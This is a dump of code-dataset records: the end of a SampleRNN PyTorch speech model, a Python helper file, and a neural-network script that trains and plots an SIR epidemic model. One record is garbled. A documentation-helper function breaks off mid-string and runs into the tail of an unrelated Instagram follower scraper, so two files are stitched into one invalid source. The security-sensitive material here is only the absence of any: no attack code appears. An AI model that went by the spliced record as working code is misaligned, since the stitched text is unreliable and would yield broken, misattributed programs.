self.conds_linguistic_phonemes(\n input_conds[:, :, 4].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 5].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 6].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + vowels_size] = self.conds_linguistic_vowels(\n input_conds[:, :, 27].long())\n last_index += vowels_size\n\n input_conds_aux[:, :, last_index:last_index + gpos_size] = self.conds_linguistic_gpos(\n input_conds[:, :, 31].long())\n last_index += gpos_size\n\n input_conds_aux[:, :, last_index:last_index + gpos_size] = self.conds_linguistic_gpos(\n input_conds[:, :, 33].long())\n last_index += gpos_size\n\n input_conds_aux[:, :, last_index:last_index + gpos_size] = self.conds_linguistic_gpos(\n 
input_conds[:, :, 41].long())\n last_index += gpos_size\n\n input_conds_aux[:, :, last_index:last_index + tobi_size] = self.conds_linguistic_tobi(\n input_conds[:, :, 49].long())\n last_index += tobi_size\n\n # Append REAL and BOOL features after the embeddings\n input_conds_aux[:, :, last_index:last_index + 2] = input_conds[:, :, 0:2]\n last_index += 2\n\n input_conds_aux[:, :, last_index:last_index + 20] = input_conds[:, :, 7:27]\n last_index += 20\n\n input_conds_aux[:, :, last_index:last_index + 3] = input_conds[:, :, 28:31]\n last_index += 3\n\n input_conds_aux[:, :, last_index:last_index + 1] = input_conds[:, :, 32:33]\n last_index += 1\n\n input_conds_aux[:, :, last_index:last_index + 7] = input_conds[:, :, 34:41]\n last_index += 7\n\n input_conds_aux[:, :, last_index:last_index + 7] = input_conds[:, :, 42:49]\n last_index += 7\n\n input_conds_aux[:, :, last_index:] = input_conds[:, :, 50:]\n\n # Move to CUDA if required\n if input_conds.is_cuda:\n input_conds_aux = input_conds_aux.cuda()\n\n # Return it\n return input_conds_aux\n\n def forward(self, utterance_samples, speaker_conds, utterance_conds, utterances_reset):\n\n # Get basic Parameters\n batch_size, time_steps, _ = utterance_conds.shape\n\n # Initialize Hidden States Dict\n if self.frame_level_hidden_states is None:\n self.frame_level_hidden_states = {\n rnn: [None] * utterance_conds.shape[0] for rnn in self.frame_level_layers\n }\n\n # Check that there are valid samples to propagate\n if not any(utterances_reset != 2):\n return_tensor = torch.zeros(\n utterance_samples.shape[0],\n self.conf.architecture['receptive_field'],\n self.quantizer.q_levels\n )\n if utterance_samples.is_cuda:\n return_tensor = return_tensor.cuda()\n return return_tensor\n\n # Clean the inputs\n else:\n utterance_samples = utterance_samples[utterances_reset != 2] if utterance_samples is not None else None\n utterance_conds = utterance_conds[utterances_reset != 2]\n speaker_conds = speaker_conds[utterances_reset != 2]\n\n # Check if we are dealing with linguistic conditionants to apply the embeddings\n if self.conf.conditionants['utterance_type'] in ['linguistic', 'linguistic_lf0']:\n utterance_conds = self._format_linguistic_features(utterance_conds)\n\n # Prepare Conds\n speaker_conds = speaker_conds.unsqueeze(1).expand(utterance_conds.shape[0], time_steps, -1)\n\n # Apply Linear transformation to the input conds\n input_conds = self._conds_adaptation_layer(torch.cat((utterance_conds, speaker_conds), dim=2))\n\n # Training Mode\n if self.training:\n\n # Create holder of the result\n return_tensor = torch.zeros(batch_size, self.conf.architecture['receptive_field'], self.quantizer.q_levels)\n\n # Move to CUDA if required\n if utterance_samples.is_cuda:\n return_tensor = return_tensor.cuda()\n\n # Get the model output\n model_output = self.do_train(\n input_samples=utterance_samples,\n input_conds=input_conds,\n utterances_reset=utterances_reset\n )\n\n # Store the result in the appropriate positions\n last_index = 0\n for reset_index, reset_item in enumerate(utterances_reset):\n if reset_item != 2:\n return_tensor[reset_index, :, :] = model_output[last_index, :, :]\n last_index += 1\n\n # Return the torch.Tensor\n return return_tensor\n\n # Inference Mode\n else:\n\n # Create holder of the result\n return_tensor = torch.zeros(batch_size, self.conf.architecture['frame_size'] + time_steps *\n self.conf.architecture['frame_size'])\n\n # Move to CUDA if required\n if utterance_conds.is_cuda:\n return_tensor = return_tensor.cuda()\n\n # Get the model 
output\n model_output = self.do_infer(\n utterances_conds=input_conds,\n utterances_reset=utterances_reset\n )\n\n # Store the result in the appropriate positions\n last_index = 0\n for reset_index, reset_item in enumerate(utterances_reset):\n if reset_item != 2:\n return_tensor[reset_index, :] = model_output[last_index, :]\n last_index += 1\n\n # Return the torch.Tensor\n return return_tensor\n\n def do_train(self, input_samples, input_conds, utterances_reset):\n\n # Get batch_size\n (batch_size, _) = input_samples.size()\n\n # Initialize upper level conditioners\n upper_tier_conditioning = None\n\n # Iterate over the list of frame level layers, from the top tier downwards\n for frame_level_layer in reversed(self.frame_level_layers):\n # Compute samples to pass in current frame level layer\n from_index = self.frame_level_layers[-1].frame_input_samples - frame_level_layer.frame_input_samples\n to_index = -frame_level_layer.frame_input_samples + 1\n\n # Dequantize the samples back to real values\n frame_layer_input_samples = self.quantizer.dequantize(input_samples[:, from_index: to_index])\n\n # Reshape samples to (batch_size, seq_len, frame_level_fs)\n frame_layer_input_samples = frame_layer_input_samples.contiguous() \\\n .view(batch_size, -1, frame_level_layer.frame_input_samples)\n\n # Get next frame level hidden state\n frame_level_hidden_state = self._get_frame_level_hidden_states(\n frame_level_layer=frame_level_layer,\n reset_list=utterances_reset\n )\n\n # Propagate through current frame level layer\n (upper_tier_conditioning, new_hidden) = frame_level_layer(\n input_samples=frame_layer_input_samples,\n input_conds=input_conds,\n upper_tier_conditioning=upper_tier_conditioning,\n rnn_hidden_state=frame_level_hidden_state\n )\n\n # Store new hidden state in the dictionary\n self._set_frame_level_hidden_states(new_hidden.detach(), frame_level_layer, utterances_reset)\n\n # Get sample level input\n sample_layer_input_samples = input_samples[:, (self.frame_level_layers[-1].frame_input_samples -\n self.sample_level_layer.frame_input_samples):]\n\n # Propagate through sample level layer and return the result\n return self.sample_level_layer(\n input_samples=sample_layer_input_samples,\n input_conds=input_conds,\n upper_tier_conditioning=upper_tier_conditioning\n )\n\n def do_infer(self, utterances_conds, utterances_reset):\n # Get batch_size\n (batch_size, num_portions, conds_size) = utterances_conds.size()\n\n # Create a Tensor to store the generated samples in\n generated_sequences = torch.zeros(\n batch_size,\n self.conf.architecture['frame_size'] + num_portions * self.conf.architecture['frame_size'],\n dtype=torch.int64\n ).fill_(self.quantizer.quantize_zero())\n\n # Move to CUDA\n if utterances_conds.is_cuda:\n generated_sequences = generated_sequences.cuda()\n\n # Create a list to store the conditioning\n frame_level_outputs = [None for _ in self.frame_level_layers]\n\n # Iterate over the samples\n for generated_sample in range(self.conf.architecture['frame_size'], generated_sequences.shape[1]):\n # Compute conds index\n conds_indx, _ = divmod(generated_sample, self.conf.architecture['frame_size'])\n conds_indx -= 1\n\n # Once the first sample has been generated, clear the pending reset flags\n if generated_sample == self.conf.architecture['frame_size'] + 1:\n utterances_reset[utterances_reset == 1] = 0\n\n # Iterate over Frame Level layers\n for (frame_level_indx, frame_level_layer) in reversed(list(enumerate(self.frame_level_layers))):\n\n # If the generated sample is not a multiple of the input size, skip\n if generated_sample % frame_level_layer.frame_input_samples != 0:\n continue\n\n # Prepare 
the input samples to enter the model\n frame_layer_input_samples = torch.autograd.Variable(self.quantizer.dequantize(\n generated_sequences[:, generated_sample - frame_level_layer.frame_input_samples:generated_sample]\n ).unsqueeze(1))\n\n # Move the variable to CUDA, if available\n if utterances_conds.is_cuda:\n frame_layer_input_samples = frame_layer_input_samples.cuda()\n\n # Check if we have conditioning\n if frame_level_indx == len(self.frame_level_layers) - 1:\n upper_tier_conditioning = None\n\n # If we are not in the last tier\n else:\n\n # Compute frame_index\n frame_index = (generated_sample // frame_level_layer.frame_input_samples) % \\\n self.frame_level_layers[frame_level_indx + 1].frame_ratio\n\n # Get the upper tier conditioning from the previous upper tier\n upper_tier_conditioning = frame_level_outputs[frame_level_indx + 1][:, frame_index, :] \\\n .unsqueeze(1)\n\n # Get the stored frame level hidden states\n frame_level_hidden_state = self._get_frame_level_hidden_states(\n frame_level_layer=frame_level_layer,\n reset_list=utterances_reset\n )\n\n # Propagate through current frame level layer\n frame_level_outputs[frame_level_indx], new_frame_level_hidden_state = \\\n frame_level_layer(\n input_samples=frame_layer_input_samples,\n input_conds=utterances_conds[:, conds_indx, :].unsqueeze(1),\n upper_tier_conditioning=upper_tier_conditioning,\n rnn_hidden_state=frame_level_hidden_state\n )\n\n # Set the new frame level hidden state\n self._set_frame_level_hidden_states(\n new_hidden_state_tensor=new_frame_level_hidden_state.detach(),\n frame_level_layer=frame_level_layer,\n reset_list=utterances_reset\n )\n\n # Prepare the input samples for the Sample Level Layer\n sample_layer_input_samples = \\\n generated_sequences[:, generated_sample - self.sample_level_layer.frame_input_samples:generated_sample]\n\n # Move the variable to CUDA, if available\n if utterances_conds.is_cuda:\n sample_layer_input_samples = sample_layer_input_samples.cuda()\n\n # Prepare conditioning\n upper_tier_conditioning = frame_level_outputs[0][:, generated_sample % self.sample_level_layer\n .frame_input_samples, :].unsqueeze(1)\n\n # Store generated samples\n generated_sequences[:, generated_sample] = self.sample_level_layer(\n input_samples=sample_layer_input_samples,\n input_conds=utterances_conds[:, conds_indx, :].unsqueeze(1),\n upper_tier_conditioning=upper_tier_conditioning\n ).squeeze(1).exp_().multinomial(1).squeeze(1)\n\n # Return generated samples\n return generated_sequences\n", "repo_name": "entn-at/samplernn_pytorch", "sub_path": "samplernn/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 32039, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": 
"attribute"}, {"api_name": "torch.nn.GRU", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.nn.Parameter", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn.ConvTranspose1d", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.nn.Parameter", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "attribute"}, {"api_name": "torch.nn.init.constant_", "line_number": 87, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 87, "usage_type": "attribute"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 90, "usage_type": "attribute"}, {"api_name": "torch.nn.init.constant_", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "attribute"}, {"api_name": "torch.nn.init.uniform_", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.nn.init.constant_", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "attribute"}, {"api_name": "utils.concat_init", "line_number": 102, "usage_type": "call"}, {"api_name": "utils.lecun_uniform", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "attribute"}, {"api_name": "utils.concat_init", "line_number": 107, "usage_type": "call"}, {"api_name": "utils.lecun_uniform", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "attribute"}, {"api_name": "torch.nn.init.constant_", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 119, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 121, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 192, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 202, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 204, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 205, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 207, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 209, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 
210, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 211, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 224, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 224, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 227, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 232, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 232, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 239, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 245, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 252, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 252, "usage_type": "attribute"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 259, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 259, "usage_type": "attribute"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 268, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 268, "usage_type": "attribute"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 270, "usage_type": "attribute"}, {"api_name": "torch.nn.init.constant_", "line_number": 271, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 271, "usage_type": "attribute"}, {"api_name": "utils.lecun_uniform", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.nn.init.constant_", "line_number": 274, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 274, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 279, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 279, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 280, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 281, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 312, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 316, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 316, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.relu", "line_number": 320, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 320, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 329, "usage_type": "attribute"}, {"api_name": "configuration.SampleRNNConfiguration", "line_number": 333, "usage_type": "name"}, {"api_name": "utils.SampleRNNQuantizer", "line_number": 334, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 336, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 337, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 338, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 339, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 341, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 343, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 346, "usage_type": "name"}, {"api_name": "configuration.SampleRNNConfiguration", 
"line_number": 348, "usage_type": "name"}, {"api_name": "utils.SampleRNNQuantizer", "line_number": 348, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 358, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 358, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 359, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 359, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 363, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 363, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 367, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 367, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 371, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 371, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 377, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 377, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 443, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 538, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 561, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 567, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 594, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 671, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 674, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 702, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 702, "usage_type": "attribute"}]}
+{"seq_id": "12357506201", "text": "import importlib\nimport inspect\nimport os\nimport sys\n\nfrom collections import defaultdict\n\n\ndef make_replace_for_doc(text):\n for to_replace in REPLACE_TO_EMPTY_STR:\n text = text.replace(to_replace, '')\n\n return text\n\n\ndef make_replace_for_response_and_value(text):\n for to_replace in REPLACE_TO_LIST:\n text = text.replace(to_replace, 'list')\n\n for _from, to in REPLACE_TO_ANOTHER.items():\n text = text.replace(_from, to)\n\n return text\n\n\ndef make_replace_for_constant(text):\n text = str(text)\n if ' number_of_followers or math.fabs(next_length - number_of_followers) < 5:\r\n break\r\n\r\ncursor.close()\r\ncon.close()\r\nbrowser.close()\r\n\r\n\r\n", "repo_name": "IbragimovaS/Parser", "sub_path": "new_insta.py", "file_name": "new_insta.py", "file_ext": "py", "file_size_in_byte": 8811, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.Session", "line_number": 27, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 33, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 66, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 72, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 72, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 88, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 94, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 103, "usage_type": "call"}, {"api_name": "ibm_db_dbi.connect", "line_number": 105, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 111, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 125, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 127, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 130, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 141, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 141, "usage_type": "call"}, {"api_name": "math.fabs", "line_number": 187, "usage_type": "call"}]}
+{"seq_id": "39292279938", "text": "from training import train\nfrom constants import ROOT_DIR\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.utils.data import DataLoader\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom models import SIRNetwork\nfrom utils import SIR_solution\n\nif __name__ == '__main__':\n\n # Initial Conditions\n N = 1\n rescaling_factor = 1\n\n infected = 0.2\n susceptible = N - infected\n recovered = 0\n\n s_0 = susceptible / N * rescaling_factor\n i_0 = infected / N * rescaling_factor\n r_0 = 0\n\n # Equation parameters\n initial_conditions = [0, [s_0, i_0, r_0]]\n beta = round(0.8, 2)\n gamma = round(0.2, 2)\n\n # Sanity check\n assert i_0 + s_0 + r_0 == rescaling_factor\n\n # Model parameters\n t_final = 20\n train_size = 2500\n decay = 0.0\n hack_trivial = False\n epochs = 1000\n lr = 8e-4\n\n # Scipy solver solution\n t = np.linspace(0, t_final, t_final)\n s_p, i_p, r_p = SIR_solution(t, s_0, i_0, r_0, beta, gamma)\n\n # Init model\n sir = SIRNetwork(layers=2, hidden=50)\n\n try:\n # It tries to load the model, otherwise it trains it\n checkpoint = torch.load(\n ROOT_DIR + '/models/SIR/s_0={:.2f}-i_0={:.2f}-r_0={:.2f}'\n '-t_0={}-t_f={:.2f}_beta={}_gamma={}.pt'.format(s_0,\n i_0, r_0,\n initial_conditions[0],\n t_final, beta,\n gamma))\n except FileNotFoundError:\n # Train\n optimizer = torch.optim.Adam(sir.parameters(), lr=lr)\n writer = SummaryWriter(\n 'runs/' + 's_0={:.2f}-i_0={:.2f}-r_0={:.2f}-t_0={:.2f}-t_f={:.2f}_beta={}_gamma={}.pt'.format(s_0,\n i_0, r_0,\n initial_conditions[\n 0],\n t_final, beta,\n gamma))\n sir, train_losses, run_time, optimizer = train(sir, initial_conditions, t_final=t_final, epochs=epochs,\n num_batches=10, hack_trivial=hack_trivial,\n train_size=train_size, optimizer=optimizer,\n decay=decay,\n writer=writer, beta=beta, gamma=gamma)\n # Save the model\n torch.save({'model_state_dict': sir.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict()},\n ROOT_DIR + '/models/SIR/s_0={:.2f}-i_0={:.2f}-r_0={:.2f}'\n '-t_0={}-t_f={:.2f}_beta={}_gamma={}.pt'.format(s_0,\n i_0, r_0,\n initial_conditions[0],\n t_final,\n beta,\n gamma))\n # Load the checkpoint\n checkpoint = torch.load(\n ROOT_DIR + '/models/SIR/s_0={:.2f}-i_0={:.2f}-r_0={:.2f}'\n '-t_0={}-t_f={:.2f}_beta={}_gamma={}.pt'.format(s_0,\n i_0, r_0,\n initial_conditions[0],\n t_final, beta,\n gamma))\n\n # Load the model\n sir.load_state_dict(checkpoint['model_state_dict'])\n\n # Test between 0 and t_final\n grid = torch.arange(0, t_final, out=torch.FloatTensor()).reshape(-1, 1)\n t_dl = DataLoader(dataset=grid, batch_size=1, shuffle=False)\n s_hat = []\n i_hat = []\n r_hat = []\n\n for i, t in enumerate(t_dl, 0):\n # Network solutions\n s, i, r = sir.parametric_solution(t, initial_conditions)\n s_hat.append(s.item())\n i_hat.append(i.item())\n r_hat.append(r.item())\n\n # Colors and Linewidth\n blue = '#3366ff'\n red = '#cc0000'\n green = '#13842e'\n linewidth = 1.5\n # Plot network solutions\n plt.figure(figsize=(12, 5))\n plt.plot(range(len(s_hat)), s_hat, label='Susceptible', color=blue, linewidth=linewidth)\n plt.plot(range(len(i_hat)), i_hat, label='Infected', color=red, linewidth=linewidth)\n plt.plot(range(len(r_hat)), r_hat, label='Recovered', color=green, linewidth=linewidth)\n plt.plot(range(len(s_p)), s_p, label='Susceptible - Scipy', linestyle='--', color=blue, linewidth=linewidth)\n plt.plot(range(len(i_p)), i_p, label='Infected - Scipy', linestyle='--', color=red, linewidth=linewidth)\n plt.plot(range(len(r_p)), r_p, 
label='Recovered - Scipy', linestyle='--', color=green, linewidth=linewidth)\n plt.title('Solving SIR model with Beta = {} | Gamma = {} \\n'\n 'Starting conditions: S(0) = {:.2f} | I(0) = {:.2f} | R(0) = {:.2f} \\n'.format(beta, gamma, s_0, i_0, r_0))\n plt.legend(loc='lower right')\n plt.xlabel('Time')\n plt.ylabel('S(t), I(t), R(t)')\n plt.savefig(\n ROOT_DIR + '/plots/SIR_s0={:.2f}_i0={:.2f}_r0={:.2f}_beta={}_gamma={}.png'.format(s_0, i_0, r_0, beta, gamma))\n plt.show()\n\n # Compute loss as a function of the time\n log_losses = []\n for i, t in enumerate(t_dl, 0):\n from losses import sir_loss\n\n t.requires_grad = True\n s, i, r = sir.parametric_solution(t, initial_conditions)\n t_loss = sir_loss(t, s, i, r, beta, gamma)\n log_losses.append(np.log(t_loss.item()))\n\n plt.figure(figsize=(15, 5))\n plt.plot(range(len(log_losses)), log_losses)\n plt.xlabel('Time')\n plt.ylabel('Logloss')\n plt.title('Solving SIR model with Beta = {} | Gamma = {} \\n'\n 'Starting conditions: S(0) = {:.2f} | I(0) = {:.2f} | R(0) = {:.2f} \\n'.format(beta, gamma, s_0, i_0, r_0))\n plt.show()\n", "repo_name": "tmscarla/improving-transfer-learning", "sub_path": "differential-equations/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 6661, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.linspace", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.SIR_solution", "line_number": 43, "usage_type": "call"}, {"api_name": "models.SIRNetwork", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 50, "usage_type": "call"}, {"api_name": "constants.ROOT_DIR", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 60, "usage_type": "call"}, {"api_name": "training.train", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 73, "usage_type": "call"}, {"api_name": "constants.ROOT_DIR", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 83, "usage_type": "call"}, {"api_name": "constants.ROOT_DIR", "line_number": 84, "usage_type": "name"}, {"api_name": "torch.arange", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "constants.ROOT_DIR", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "losses.sir_loss", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, 